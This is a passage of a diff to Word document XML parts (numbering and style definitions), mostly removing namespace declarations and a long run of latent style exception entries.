-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="33AD3F0F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -4447,7 +4466,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -4464,389 +4483,144 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="382">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Level 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
